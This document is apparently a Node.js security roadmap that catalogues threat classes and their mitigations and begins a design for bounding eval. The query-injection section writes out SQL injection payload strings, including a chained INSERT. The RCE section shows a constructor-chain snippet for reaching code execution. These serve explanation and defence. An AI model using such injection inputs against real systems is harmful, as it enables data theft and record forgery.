21 | > The research community has broadly classified the defense techniques
22 | > against zero-day exploits as statistical-based, signature-based,
23 | > behavior-based, and hybrid techniques (Kaur & Singh, 2014). The
24 | > primary goal of each of these techniques is to identify the exploit in
25 | > real time or as close to real time as possible and quarantine the
26 | > specific attack to eliminate or minimize the damage caused by the
27 | > attack.
28 | 
29 | Being able to respond quickly to limit damage and recover is
30 | critical.
31 | 
32 | That same paper talks at length about *worms*: programs that
33 | compromise a system without explicit direction by a human attacker,
34 | and use the compromise of one system to find other systems to
35 | automatically compromise.
36 | 
37 | Researchers have found ways ([details][saccone]) that worms
38 | might propagate throughout `registry.npmjs.org` and common practices
39 | that might allow a compromise to jump from the module repository to
40 | large numbers of production servers.
41 | 
42 | If we can structure systems so that compromising one component
43 | does not make it easier to compromise another component, then
44 | we can contain damage due to worms.
45 | 
46 | If, in a population of components, we can keep susceptibility below a
47 | critical threshold so that worms spend more time searching for targets
48 | than compromising targets, then we can buy time for humans to
49 | understand and respond.
50 | 
51 | If we prevent compromise of a population of modules by a zero day
52 | from causing widespread compromise of a population of production
53 | servers then we can limit damage to end users.
54 | 
55 | [sans]: https://www.sans.org/reading-room/whitepapers/bestprac/defenses-zero-day-exploits-various-sized-organizations-35562
56 | [saccone]: https://www.kb.cert.org/CERT_WEB/services/vul-notes.nsf/6eacfaeab94596f5852569290066a50b/018dbb99def6980185257f820013f175/$FILE/npmwormdisclosure.pdf
57 | 


--------------------------------------------------------------------------------
/chapter-1/threat-BOF.md:
--------------------------------------------------------------------------------
 1 | # Buffer Overflow
 2 | 
 3 | A buffer overflow occurs when code fails to check an index into an
 4 | array while unpacking input, allowing parts of that input to overwrite
 5 | memory locations that other trusted code assumes are inviolable.
 6 | A similar technique also allows exfiltrating data like cryptographic keys
 7 | when an unchecked limit leads to copying unintended memory locations into
 8 | an output.
 9 | 
10 | Buffer overflow vectors in Node.js are:
11 | 
12 | *  The Node.js runtime and dependencies like the JS runtime and OpenSSL
13 | *  [C++ addons][], third-party modules that use N-API (the native API).
14 | *  Child processes.  For example, code may route a request body to an
15 |    [image processing library][imagetragick] that was not
16 |    written with untrusted inputs in mind.
17 | 
18 | Buffer overflows are common, but we class them as low frequency for
19 | Node.js in particular.  The runtime is highly reviewed compared to the
20 | average C++ backend; C++ addons are a small subset of third-party
21 | modules; and there's no reason to believe that child processes spawned
22 | by Node.js applications are especially risky.
23 | 
24 | [imagetragick]: https://imagetragick.com/
25 | [C++ addons]: https://nodejs.org/api/addons.html#addons_c_addons
26 | 


--------------------------------------------------------------------------------
/chapter-1/threat-CRY.md:
--------------------------------------------------------------------------------
 1 | # Weak Crypto {#CRY}
 2 | 
 3 | Cryptographic primitives are often the only practical way to solve
 4 | important classes of problems, but it's easy to make mistakes when using
 5 | `crypto.*` APIs.
 6 | Failing to identify third-party modules that use crypto (or should be
 7 | using crypto) and to determine whether they are using it properly can lead
 8 | to a false sense of security.
 9 | 
10 | ["Developer-Resistant Cryptography"][Cairns & Steel] by Cairns & Steel
11 | notes:
12 | 
13 | > The field of cryptography is inherently difficult. Cryptographic API
14 | > development involves narrowing a large, complex field into a small set
15 | > of usable functions.  Unfortunately, these APIs are often far from
16 | > simple.
17 | 
18 | > ...
19 | 
20 | > In 2013, study by Egele et al. revealed even more startling figures
21 | > [1]. In this study, six rules were defined which, if broken, indicated
22 | > the use of insecure protocols. More than 88% of the 11,000 apps
23 | > analyzed broke at least one rule. Of the rule-breaking apps, most
24 | > would break not just one, but multiple rules. Some of these errors
25 | > were attributed to negligence, for example test code included in
26 | > release versions. However, in most cases it appears developers
27 | > unknowingly created insecure apps.
28 | 
29 | > ...
30 | 
31 | > The human aspect can be improved through better education for
32 | > developers.  Sadly, this approach is unlikely to be a complete
33 | > solution. It is unreasonable to expect a developer to be a security
34 | > expert when most of their time is spent on other aspects of software
35 | > design.
36 | 
37 | Code that uses cryptography badly can seem like it's working as intended
38 | until an attacker unravels it.
39 | Testing code that uses cryptographic APIs is hard.  It's hard to write
40 | a unit test to check that a skilled cryptographer can't efficiently
41 | extract information from a random looking string or compute a random
42 | looking string that passes a verifier.
43 | 
44 | Weak cryptography can also mask other problems.  For example, a
45 | security auditor might try to check for leaks of email addresses by
46 | creating a dummy account `Carol <carol@example.com>` and
47 | check for the string `carol@example.com` in data served in responses,
48 | while recursing into substrings encoded using base64, gzip, or other
49 | common encodings.
50 | If some of that data is poorly encrypted, then the auditor might
51 | falsely conclude that an attacker who can't break strong
52 | encryption does not have access to emails.
53 | 
54 | [Cairns & Steel]: https://www.w3.org/2014/strint/papers/48.pdf
55 | 


--------------------------------------------------------------------------------
/chapter-1/threat-DEX.md:
--------------------------------------------------------------------------------
 1 | # Poor Developer Experience
 2 | 
 3 | Security specialists have a vested interest in keeping developers
 4 | happy & productive.
 5 | 
 6 | Developer experience is not only a business or usability threat.  When
 7 | a team is less agile, it cannot respond as effectively to security
 8 | threats, or roll out interfaces that let end users manage their own
 9 | security and privacy.
10 | 
11 | Application developers may miss deadlines, cut features, or
12 | compromise maintainability if any of the following are true:
13 | 
14 | *  starting a new project takes too long
15 | *  they often cannot make progress until they get feedback from
16 |    security specialists (or other specialists like I18N, Legal, UI)
17 | *  repeated tasks are slow:
18 |    *  restarting an application or service,
19 |    *  running `npm install`, or
20 |    *  rerunning tests after small changes
21 | *  getting approval for a pull request takes long enough that
22 |    upstream has to be manually merged into the branch.
23 | *  breaking common code out of an application into an npm
24 |    module becomes hard, so it is easier to copy-paste from one
25 |    application to another
26 | *  a developer has to spend significant time getting a release
27 |    candidate approved instead of working on the next iteration.
28 | 


--------------------------------------------------------------------------------
/chapter-1/threat-DOS.md:
--------------------------------------------------------------------------------
 1 | 
 2 | # Denial of Service
 3 | 
 4 | Denial of service occurs when a well-behaved, authorized user cannot
 5 | access a system because of misbehavior by another.
 6 | 
 7 | "Denial of service" is most often associated with [flooding][] a
 8 | network endpoint so it cannot respond to the smaller number of
 9 | legitimate requests, but there are other vectors:
10 | 
11 | *  Causing the server to use up [a finite resource][res-exh]
12 |    like file descriptors, causing threads to block.
13 | *  Causing the target to issue a network request to an endpoint the
14 |    attacker controls and responding slowly.
15 | *  Causing the target to store malformed data which triggers an error
16 |    in code that unpacks the stored data and causes a server to provide
17 |    an error response to a well-formed request.
18 | *  Exploiting event dispatch bugs to cause starvation
19 |    ([example][disclosure]).
20 | *  Supplying over-large inputs to super-linear (> O(n)) algorithms.
21 |    For example supplying a crafted string to an ambiguous `RegExp`
22 |    to cause [excessive backtracking][].
23 | 
24 | Denial of service attacks that exploit the network layer are usually
25 | handled in the reverse proxy and we find no reason to suppose that
26 | node applications are especially vulnerable to other kinds of denial
27 | of service.
28 | 
29 | ## Additional risk: Integrity depends on quick completion
30 | 
31 | A system requires [atomicity][] when two or more effects have to
32 | happen together or not at all.  Databases put a lot of engineering
33 | effort into ensuring atomicity.
34 | 
35 | Sometimes, ad-hoc code seems to preserve atomicity when tested under
36 | low-load conditions:
37 | 
38 | ```js
39 | // foo() and bar() need to happen together or not at all.
40 | foo(x);
41 | // Not much of a gap here under normal conditions for another part
42 | // of the system to observe foo() but not bar().
43 | try {
44 |   bar(x);
45 | } catch (e) {
46 |   undoFoo();
47 |   throw e;
48 | }
49 | ```
50 | 
51 | This code, though buggy, may be highly reliable under normal
52 | conditions, but may fail under load, or if an attacker can cause
53 | `bar()` to run for a while before its side-effect happens, for example
54 | by causing excessive backtracking in a regular expression used to
55 | check a precondition.
56 | 
57 | Some of the same techniques that make a system unavailable can
58 | widen the window of vulnerability within which an attacker can exploit
59 | an atomicity failure.
60 | 
61 | Client-side, runaway computations rarely escalate into an integrity
62 | violation since atomicity requirements are typically maintained on the
63 | server.  Server-side, we expect that this problem would be more
64 | common.
65 | 
66 | [flooding]: https://capec.mitre.org/data/definitions/125.html
67 | [excessive backtracking]: https://www.regular-expressions.info/catastrophic.html
68 | [res-exh]: https://capec.mitre.org/data/definitions/131.html
69 | [disclosure]: https://sandstorm.io/news/2015-04-08-osx-security-bug
70 | [atomicity]: https://en.wikipedia.org/wiki/ACID#Atomicity
71 | 


--------------------------------------------------------------------------------
/chapter-1/threat-EXF.md:
--------------------------------------------------------------------------------
 1 | # Exfiltration of Data
 2 | 
 3 | "Exfiltration" happens when an attacker causes a response to include
 4 | data that it should not have.  Web applications and services may
 5 | produce response bodies that include too much information.
 6 | 
 7 | This can happen when server-side JavaScript has access to more
 8 | data than it needs to do its job and either
 9 | 
10 | *  it serializes unintended information and no one notices or
11 | *  an attacker controls what is serialized.
12 | 
13 | Consider
14 | 
15 | ```js
16 | Object.assign(output, this[str]);
17 | ```
18 | 
19 | If the attacker controls `str` then they may be able to pick any field
20 | of `this` or possibly any global field.
21 | 
22 | This problem is not new to Node.js but we consider this higher
23 | frequency for Node.js for these reasons:
24 | 
25 | *  There is no equivalent to `Object.assign` in most backend languages.
26 |    It's possible in Python and Java via reflective operators but
27 |    security auditors can narrow down code that might suffer this vulnerability
28 |    to those that use reflection.
29 |    `Object.assign`, `$.extend` and similar operators are widely used in
30 |    idiomatic JavaScript.
31 | *  In most backend languages, `obj[...]` does not allow aliasing of all
32 |    properties.
33 |    For example, Python only allows `obj[...]` on types that implement `__getitem__`,
34 |    which user-defined classes do not do by default.
35 |    Java has generic collections and maps, but for user-defined classes
36 |    the equivalent code pattern requires reflection and possibly calls to
37 |    `setAccessible(true)`.
38 | 
39 | JavaScript makes it easier to alias properties and methods and common
40 | JavaScript idioms make it harder for security auditors to narrow down
41 | code that might inadvertently allow exfiltration.
42 | 
43 | `Object.assign` and related copy operators are also potential
44 | [mass assignment][] vectors as in:
45 | 
46 | ```js
47 | Object.assign(systemData, JSON.parse(untrustedInput))
48 | ```
49 | 
50 | [mass assignment]: https://en.wikipedia.org/wiki/Mass_assignment_vulnerability
51 | 


--------------------------------------------------------------------------------
/chapter-1/threat-LQC.md:
--------------------------------------------------------------------------------
 1 | # Low Quality Code
 2 | 
 3 | An application or service is vulnerable when its security depends on a
 4 | module upholding a contract that it does not uphold.
 5 | 
 6 | Most new software has bugs when first released.  Over time, maintainers
 7 | fix the bugs that have obvious, bad consequences.
 8 | 
 9 | Often, widely used software has problem areas that are well understood.
10 | Developers can make a pragmatic decision to use it while taking
11 | additional measures to make sure those problems don't compromise
12 | security guarantees.
13 | 
14 | Orphaned code that has not been updated recently may have done a
15 | good job of enforcing its contract, but attackers may have discovered
16 | new tricks, or the threat environment may have changed so it may
17 | no longer enforce its contract in the face of an attack.
18 | 
19 | Low quality code constitutes a threat when developers pick a module
20 | without understanding the caveats to the contract it actually
21 | provides, or without taking additional measures to limit damage when
22 | it fails.
23 | 
24 | It may be the case that there's higher risk of poorly understood
25 | contracts when a community is experimenting rapidly as is the case for
26 | Node.js, or early on before the community has settled on clear winners
27 | for core functions, but we consider the frequency of vulnerabilities
28 | due to low quality code in the npm repository roughly the same as for
29 | other public module repositories.
30 | 


--------------------------------------------------------------------------------
/chapter-1/threat-MTP.md:
--------------------------------------------------------------------------------
 1 | # Malicious Third-Party Code
 2 | 
 3 | Most open-source developers work in good faith to provide useful tools
 4 | to the larger community of developers but
 5 | 
 6 | *  Passwords are easy to guess, so attackers can suborn accounts that
 7 |    are only protected by a password.  On GitHub, developers may
 8 |    configure their accounts to require a
 9 |    [second factor][github-second-factor] but this is not yet the norm.
10 | *  Pull requests that aren't thoroughly reviewed may dilute security
11 |    properties.
12 | *  Phishing requests targeted at GitHub users ([details][dimnie]) can
13 |    execute code on unwary committers' machines.
14 | *  A pull request may appear to come from a higher-reputation source
15 |    ([details][unsigned commits]).
16 | 
17 | Malicious code can appear in the server-side JavaScript running in
18 | production, or can take the form of install hooks that run on a
19 | developer workstation with access to local repositories and to
20 | writable elements of `$PATH`.
21 | 
22 | Projects that deploy the latest version of a dependency straight to
23 | production are more vulnerable to malicious code.  If an attacker
24 | manages to publish a version with malicious code which is quickly
25 | discovered, it affects projects that deploy during that short "window
26 | of vulnerability."  Projects that `npm install` the latest version
27 | straight to production are more likely to fall in that window than
28 | projects that cherrypick versions or that shrinkwrap to make sure that
29 | their development versions match deployed versions.
30 | 
31 | [Bower is deprecated][bower-depr] so our discussions focus on
32 | `npmjs.org`, but it's worth noting that Bower has a single point of
33 | failure.  Anyone who can create a release branch can commit and
34 | publish a new version.
35 | 
36 | [`npm profile`][npm profile] allows requiring
37 | [two factor auth][npm auth-and-writes] for publishing and privilege
38 | changes.  If the npm accounts that can publish new versions of a
39 | package only check out code from a GitHub account all of whose
40 | committers use two factors, then there is no single password that can
41 | compromise the system.
42 | 
43 | The frequency of malicious code vulnerabilities affecting Node.js is
44 | probably roughly the same as that for other public module repositories.
45 | The npm repo has been a target in the past [1][getcookies-disclosure]
46 | [2][crossenv-typosquat-disclosure].
47 | 
48 | The [npm Blog][crossenv-typosquat-disclosure] explains what to do if
49 | you believe you have found malicious code:
50 | 
51 | > On August 1, a user notified us via Twitter that a package with a
52 | > name very similar to the popular `cross-env` package was sending
53 | > environment variables from its installation context out to
54 | > npm.hacktask.net. We investigated this report immediately and took
55 | > action to remove the package. Further investigation led us to remove
56 | > about 40 packages in total.
57 | >
58 | > ...
59 | >
60 | > Please do reach out to us immediately if you find malware on the
61 | > registry. The best way to do so is by sending email to
62 | > [security@npmjs.com](mailto:security@npmjs.com). We will act to
63 | > clean up the problem and find related problems if we can.
64 | 
65 | 
66 | [github-second-factor]: https://help.github.com/articles/about-two-factor-authentication/
67 | [bower-depr]: https://bower.io/blog/2017/how-to-migrate-away-from-bower/
68 | [dimnie]: https://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/
69 | [unsigned commits]: https://nvisium.com/resources/blog/2017/06/21/securing-github-commits-with-gpg-signing.html
70 | [npm profile]: https://docs.npmjs.com/cli/profile
71 | [saccone]: https://www.kb.cert.org/CERT_WEB/services/vul-notes.nsf/6eacfaeab94596f5852569290066a50b/018dbb99def6980185257f820013f175/$FILE/npmwormdisclosure.pdf
72 | [npm auth-and-writes]: https://docs.npmjs.com/getting-started/using-two-factor-authentication
73 | [getcookies-disclosure]: https://blog.npmjs.org/post/173526807575/reported-malicious-module-getcookies
74 | [crossenv-typosquat-disclosure]: http://blog.npmjs.org/post/163723642530/crossenv-malware-on-the-npm-registry
75 | 


--------------------------------------------------------------------------------
/chapter-1/threat-QUI.md:
--------------------------------------------------------------------------------
 1 | # Query Injection
 2 | 
 3 | [Query injection][] occurs when an attacker causes a query sent to a
 4 | database or other backend to have a [structure][spp] that differs from
 5 | the one the developer intended.
 6 | 
 7 | ```js
 8 | connection.query(
 9 |     'SELECT * FROM Table WHERE key="' + value + '"',
10 |     callback);
11 | ```
12 | 
13 | If an attacker controls `value` and can cause it to contain a double
14 | quote, then they can cause execution of a query with a different structure.
15 | For example, if they can cause
16 | 
17 | ```js
18 | value = ' " OR 1 -- two dashes start a line comment';
19 | ```
20 | 
21 | then the query sent is `SELECT * FROM Table WHERE key=" " OR 1 -- ...`
22 | which returns more rows than intended possibly [leaking](./threat-EXF.md)
23 | data that the requester should not have been able to access, and may
24 | cause other code that loops over the result set to modify rows other than
25 | the ones the system's authors intended.
26 | 
27 | Some backends allow statement chaining so compromising a statement
28 | that seems to only read data:
29 | 
30 | ```js
31 | value = '"; INSERT INTO Table ...  --'
32 | ```
33 | 
34 | can violate system integrity by forging records:
35 | 
36 | ```js
37 | ' SELECT * FROM Table WHERE key="' + value + '" ' ===
38 | ' SELECT * FROM Table WHERE key=""; INSERT INTO Table ... --" '
39 | ```
40 | 
41 | or deny service via mass deletes.
42 | 
43 | Query injection has a [long and storied history][hall-of-shame].
44 | 
45 | [Query injection]: http://bobby-tables.com/
46 | [hall-of-shame]: http://codecurmudgeon.com/wp/sql-injection-hall-of-shame/
47 | [spp]: https://rawgit.com/mikesamuel/sanitized-jquery-templates/trunk/safetemplate.html#structure_preservation_property
48 | 


--------------------------------------------------------------------------------
/chapter-1/threat-RCE.md:
--------------------------------------------------------------------------------
 1 | # Remote Code Execution
 2 | 
 3 | Remote code execution occurs when the application interprets an
 4 | untrustworthy string as code.  When `x` is a string, `eval(x)`,
 5 | `Function(x)`, and `vm.runIn*Context(x)` all invoke the JavaScript
 6 | engine's parser on `x`.  If an attacker controls `x` then they can run
 7 | arbitrary code in the context of the CommonJS module or `vm` context
 8 | that invoked the parser.
 9 | 
10 | Sandboxing can help but widely available sandboxes have
11 | [known workarounds][denicola-vm-run] though the [frozen realms][]
12 | proposal aims to change that.
13 | 
14 | It is harder to execute remote code in server-side JavaScript.
15 | `this[x][y] = "javascript:console.log(1)"` does not cause code to
16 | execute for nearly as many `x` and `y` as in a browser.
17 | 
18 | These operators are probably rarely used *explicitly*, but some
19 | operators that convert strings to code when given a string do
20 | something else when given a `Function` instance.  `setTimeout(x, 0)`
21 | is safe when `x` is a function, but on the browser it parses a string
22 | input as code.
23 | 
24 | *  [Grepping](../appendix/experiments.md#grep-problems) shows the rate
25 |    in the top 100 modules and their transitive dependencies by simple
26 |    pattern matching after filtering out comments and string content.
27 |    This analysis works on most modules, but fails to distinguish
28 |    safe uses of `setTimeout` in modules that might run on
29 |    the client from unsafe.
30 | *  A [type based analysis](../appendix/experiments.md#jsconf) can
31 |    distinguish between those two, but the tools we tested don't
32 |    deal well with mixed JavaScript and TypeScript inputs.
33 | 
34 | Even if we could reliably identify places where strings are
35 | *explicitly* converted to code for the bulk of npm modules,
36 | it is more difficult in JavaScript to statically prove that
37 | code does not *implicitly* invoke a parser than in other
38 | common backend languages.
39 | 
40 | ```js
41 | // Let x be any value not in
42 | // (null, undefined, Object.create(null)).
43 | var x = {},
44 | // If the attacker can control three strings
45 |     a = 'constructor',
46 |     b = 'constructor',
47 |     s = 'console.log(s)';
48 | // and trick code into doing two property lookups
49 | // they control, a call with a string they control,
50 | // and one more call with any argument
51 | x[a][b](s)();
52 | // then they can cause any side-effect achievable
53 | // solely via objects reachable from the global scope.
54 | // This includes full access to any exported module APIs,
55 | // all declarations in the current module, and access
56 | // to builtin modules like child_process, fs, and net.
57 | ```
58 | 
59 | Filtering out values of `s` that "look like JavaScript" as they reach
60 | server-side code will probably not prevent code execution.
61 | [Yosuke Hasegawa][Yosuke] showed how to reencode arbitrary JavaScript using
62 | only 6 punctuation characters, and that number may
63 | [fall to 5][Masato].  ["Web Application Obfuscation"][obfusc] by
64 | Heiderich et al. catalogues ways to bypass filtering.
65 | 
66 | `eval` also allows remote-code execution in Python, PHP, and
67 | Ruby code, but in those languages `eval` operators are harder to
68 | mention implicitly which means uses are easier to check.
69 | 
70 | It is possible to dynamically evaluate strings even in statically
71 | compiled languages, for example, [JSR 223][] and
72 | [`javax.compiler`][dynjava] for Java.  In statically compiled
73 | languages there is no short implicit path to `eval` and it is not
74 | easier to `eval` an untrusted input than to use an interpreter that is
75 | isolated from the host environment.
76 | 
77 | We consider remote code execution in Node.js lower frequency than for
78 | client-side JavaScript without a Content-Security-Policy but higher
79 | than for other backend languages.  We consider the severity the same
80 | as for other backend languages.  The severity is higher than for
81 | client-side JavaScript because backend code often has access to more
82 | than one user's data and privileged access to other backends.
83 | 
84 | [denicola-vm-run]: https://gist.github.com/domenic/d15dfd8f06ae5d1109b0
85 | [frozen realms]: https://github.com/tc39/proposal-frozen-realms
86 | [Yosuke]: https://news.ycombinator.com/item?id=4370098
87 | [Masato]: https://syllab.fr/projets/experiments/xcharsjs/5chars.pipeline.html
88 | [obfusc]: https://www.amazon.com/Web-Application-Obfuscation-Evasion-Filters/dp/1597496049
89 | [JSR 223]: https://docs.oracle.com/javase/8/docs/technotes/guides/scripting/prog_guide/api.html
90 | [dynjava]: https://www.ibm.com/developerworks/library/j-jcomp/index.html
91 | 


--------------------------------------------------------------------------------
/chapter-1/threat-SHP.md:
--------------------------------------------------------------------------------
 1 | # Shell Injection during Production
 2 | 
 3 | [Shell injection][] occurs when an attacker-controlled string changes
 4 | the structure of a command passed to a shell or causes a child process
 5 | to execute an unintended command or with unintended arguments.
 6 | Typically, this is because code or a dependency invokes
 7 | [child\_process][api/child_process] with an argument partially
 8 | composed from untrusted inputs.
 9 | 
10 | Shell injection may also occur during development and deployment.  For
11 | example, [npm][npm hooks] and [Bower][bower hooks]
12 | `{pre-,,post-}install` hooks may be subject to shell injection via
13 | filenames that contain shell meta-characters in malicious transitive
14 | dependencies but we classify this as an [MTP][] vulnerability.
15 | 
16 | [MTP]: threat-MTP.md
17 | [npm hooks]: https://docs.npmjs.com/misc/scripts
18 | [bower hooks]: https://bower.io/docs/config/#hooks
19 | [Shell injection]: http://cwe.mitre.org/data/definitions/77.html
20 | [api/child_process]: https://nodejs.org/api/child_process.html
21 | 


--------------------------------------------------------------------------------
/chapter-1/threats.md:
--------------------------------------------------------------------------------
  1 | # Threat environment
  2 | 
  3 | The threat environment for Node.js is similar to that for other runtimes that
  4 | are primarily used for microservices and web frontends, but there are some
  5 | Node.js specific concerns.
  6 | 
  7 | We define both kinds of threats in this section.  A reader familiar with
  8 | web-application security can skip all but this page and the discussion
  9 | of [*unintended require*][UIR] without missing much, but may find it
 10 | helpful to refer back to the table below when reading later chapters.
 11 | 
 12 | ## Server vs Client-side JavaScript
 13 | 
 14 | Before we discuss the threat environment, it's worth noting that the threat
 15 | environment for server-side JavaScript is quite different from that for
 16 | client-side JavaScript.  For example,
 17 | 
 18 | * Client-side JavaScript runs in the context of the
 19 |   [same-origin policy][] possibly with a
 20 |   [Content-Security-Policy][CSP] which governs which code can load.
 21 |   Server-side JavaScript **code loading** is typically only
 22 |   constrained by the files on the server, and the values that can
 23 |   reach `require(...)`, `eval(...)` and similar operators.
 24 | * Client-side JavaScript typically only has access to data that the
 25 |   human using the browser should have access to.  On the server,
 26 |   applications are responsible for **data [compartmentalization][]**,
 27 |   and server-side JavaScript often has privileged access to storage
 28 |   systems and other backends.
 29 | * **File-system access** by the client typically either requires human
 30 |   interaction
 31 |   (`<input type=file>`, `Content-disposition:attachment`), or can only access
 32 |   a directory dedicated to third-party content (browser cache, local storage)
 33 |   and which is not usually on a list like `$PATH`.
 34 |   On the server, the Node runtime process's privileges determine
 35 |   [file-system access][nodejs/fs].
 36 | * Client-side JavaScript has no concept of a **shell** that converts
 37 |   strings into commands that run outside the JavaScript engine.
 38 |   Server-side JavaScript can spawn
 39 |   [child processes][nodejs/child_process] that operate on data
 40 |   received over the network, and on data that is accessible to the
 41 |   Node runtime process.
 42 | * **Network messages** sent by server-side JavaScript originate inside
 43 |   the server's LAN, but those sent by client-side JavaScript typically do not.
 44 | * **Shared memory concurrency** in client-side JavaScript happens via
 45 |   well-understood APIs like `SharedArrayBuffer`.  Experimental modules
 46 |   ([code][threads-a-gogo]) and a [workers proposal][]
 47 |   allow server-side JavaScript to fork threads; it is
 48 |   unclear how widespread these are in production or how
 49 |   [susceptible][thread corner cases] these are to memory corruption
 50 |   or exploitable race conditions.
 51 | * Client-side, the browser halts all scripts in a document when a
 52 |   single event loop cycle **runs too long**.
 53 |   Node.js has few ways to manage runaway computations on the server.
 54 | 
 55 | The threat environment for server-side JavaScript is much closer to
 56 | that for any other server-side framework than to that for JavaScript
 57 | in the browser.
 58 | 
 59 | ## Classes of Threats {#threat_table}
 60 | 
 61 | The table below lists broad classes of vulnerabilities, and for each,
 62 | a short identifier by which we refer to the class later in this
 63 | document.  This list is not meant to be comprehensive, but we expect
 64 | that a thorough security assessment would touch on most of these and
 65 | would have low confidence in an assessment that skips many.
 66 | 
 67 | The frequency and severity of vulnerabilities are guesstimates since
 68 | we have little hard data on the frequency of these in Node.js
 69 | applications, so have extrapolated from similar systems.  For example,
 70 | see discussion about frequency in [buffer overflow][BOF].
 71 | 
 72 | For each, relevant mitigation strategies appear in the mitigations
 73 | column, and link to the discussion.
 74 | 
 75 | | Shorthand | Description                                                                           | Frequency | Severity | Mitigations                 |
 76 | | --------- | ------------------------------------------------------------------------------------- | --------- | -------- | --------------------------- |
 77 | | [0DY][]   | Zero-day.  Attackers exploit a vulnerability before a fix is available.               | Low-Med   | Med-High | [cdeps][m-cd] [fail][m-fa]  |
 78 | | [BOF][]   | Buffer overflow.                                                                      | Low       | High     | [ovrsi][m-os]               |
 79 | | [CRY][]   | Misuse of crypto leads to poor access-control decisions or data leaks.                | Medium    | Medium   | [ovrsi][m-os]               |
 80 | | [DEX][]   | Poor developer experience slows or prevents release of features.                      | ?         | ?        | [dynam][m-dy] [ovrsi][m-os] |
 81 | | [DOS][]   | Denial of service                                                                     | Medium    | Low-Med  | TBD                         |
 82 | | [EXF][]   | Exfiltration of data, e.g. by exploiting reflection to serialize more than intended.  | Med-High  | Low-Med  | [ovrsi][m-os]               |
 83 | | [LQC][]   | Using low quality dependencies leads to exploit                                       | Medium    | Low-Med  | [kdeps][m-kd] [ovrsi][m-os] |
 84 | | [MTP][]   | Theft of commit rights or MITM causes `npm install` to fetch malicious code.          | Low       | Med-High | [kdeps][m-kd] [cdeps][m-cd] |
 85 | | [QUI][]   | Query injection on a production machine.                                              | Medium    | Med-High | [ovrsi][m-os] [qlang][m-ql] |
 86 | | [RCE][]   | Remote code execution, e.g. via `eval`                                                | Med-High  | High     | [dynam][m-dy] [ovrsi][m-os] |
 87 | | [SHP][]   | Shell injection on a production machine.                                              | Low       | High     | [ovrsi][m-os] [cproc][m-cp] |
 88 | | [UIR][]   | `require(untrustworthyInput)` loads code not intended for production.                 | Low       | Low-High | [dynam][m-dy]               |
 89 | 
 90 | 
 91 | ## Meltdown and Spectre
 92 | 
 93 | As of this writing, the security community is trying to digest
 94 | the implications of *Meltdown* and *Spectre*.  The
 95 | [Node.js blog][Meltdown Spectre Impact] addresses them from a
 96 | Node.js perspective, so we do not comment in depth.
 97 | 
 98 | It is worth noting though that those vulnerabilities lead to
 99 | breaches of *confidentiality*.  While confidentiality violations
100 | are serious, the suggestions that follow use design principles
101 | that prevent a violation of confidentiality from causing a
102 | violation of *integrity*.  Specifically:
103 | 
104 | *  Knowing a whitelist of production source hashes does not
105 |    allow an attacker to cause a non-production source to load.
106 | *  Our runtime `eval` mitigation relies on JavaScript reference
107 |    equality, not knowledge of a secret.
108 | 
109 | 
110 | [same-origin policy]: https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy
111 | [CSP]: https://developers.google.com/web/fundamentals/security/csp/
112 | [compartmentalization]: https://cwe.mitre.org/data/definitions/653.html
113 | [nodejs/fs]: https://nodejs.org/api/fs.html
114 | [nodejs/child_process]: https://nodejs.org/api/child_process.html
115 | [threads-a-gogo]: https://github.com/xk/node-threads-a-gogo/blob/74005641d53b0d85e8d75e2506eddbded15f5112/src/threads_a_gogo.cc#L1387
116 | [workers proposal]: https://github.com/nodejs/worker/issues/2
117 | [thread corner cases]: https://github.com/nodejs/worker/issues/4#issuecomment-306090967
118 | [Query Injection]: https://cwe.mitre.org/data/definitions/89.html
119 | [0DY]: threat-0DY.md
120 | [BOF]: threat-BOF.md
121 | [CRY]: threat-CRY.md
122 | [DEX]: threat-DEX.md
123 | [DOS]: threat-DOS.md
124 | [EXF]: threat-EXF.md
125 | [LQC]: threat-LQC.md
126 | [MTP]: threat-MTP.md
127 | [QUI]: threat-QUI.md
128 | [RCE]: threat-RCE.md
129 | [SHP]: threat-SHP.md
130 | [UIR]: threat-UIR.md
131 | [m-dy]: ../chapter-2/dynamism.md
132 | [m-kd]: ../chapter-3/knowing_dependencies.md
133 | [m-cd]: ../chapter-4/close_dependencies.md
134 | [m-os]: ../chapter-5/oversight.md
135 | [m-fa]: ../chapter-6/failing.md
136 | [m-cp]: ../chapter-7/child-processes.md
137 | [m-ql]: ../chapter-7/query-langs.md
138 | [Meltdown Spectre Impact]: https://nodejs.org/en/blog/vulnerability/jan-2018-spectre-meltdown/
139 | 


--------------------------------------------------------------------------------
/chapter-2/bounded-eval.md:
--------------------------------------------------------------------------------
  1 | # Dynamically bounding `eval`
  2 | 
  3 | If we could provide an API that was available statically, but not dynamically,
  4 | we could double-check uses of `eval` operators.
  5 | 
  6 | ```js
  7 | // API for allowing some eval
  8 | var prettyPlease = require('prettyPlease');
  9 | // Carefully reviewed JavaScript generating code
 10 | var codeGenerator = require('codeGenerator');
 11 | 
 12 | let compile;
 13 | 
 14 | prettyPlease.mayI(
 15 |     module,
 16 |     (evalPermission) => {
 17 |       compile = function (source) {
 18 |         const js = codeGenerator.generateCode(source);
 19 |         return prettyPlease.letMeEval(
 20 |             evalPermission,
 21 |             js,
 22 |             () => ((0, eval)(js)));
 23 |       };
 24 |     });
 25 | 
 26 | exports.compile = compile;
 27 | ```
 28 | 
 29 | The `prettyPlease` module cannot be pure JavaScript since only the
 30 | C++ linker can take advantage of *CodeGeneration* callbacks
 31 | ([code][CodeGeneration callbacks]) the way CSP does
 32 | ([code][CSP callback]) on the client, but the definition would be
 33 | roughly:
 34 | 
 35 | ```js
 36 | // prettyPlease module
 37 | (() => {
 38 |   const _PERMISSIVE_MODE = 0;  // Default
 39 |   const _STRICT_MODE = 1;
 40 |   const _REPORT_ONLY_MODE = 2;
 41 | 
 42 |   const _MODE = /* From command line arguments */;
 43 |   const _WHITELIST = new Set(/* From command line arguments */);
 44 | 
 45 |   const _VALID_PERMISSIONS = new WeakSet();
 46 |   const _EVALABLE_SOURCES = new Map();
 47 | 
 48 |   if (_MODE !== _PERMISSIVE_MODE) {
 49 |     // Pseudocode: the code-generation callback installed when the
 50 |     // JavaScript engine is initialized.
 51 |     function codeGenerationCheckCallback(context, source) {
 52 |       // source must be a v8::Local<v8::string> or ChakraCore equivalent
 53 |       // so no risk of polymorphing
 54 |       if (_EVALABLE_SOURCES.has(source)) {
 55 |         return true;
 56 |       }
 57 |       console.warn(...);
 58 |       return _MODE == _REPORT_ONLY_MODE;
 59 |     }
 60 |   }
 61 | 
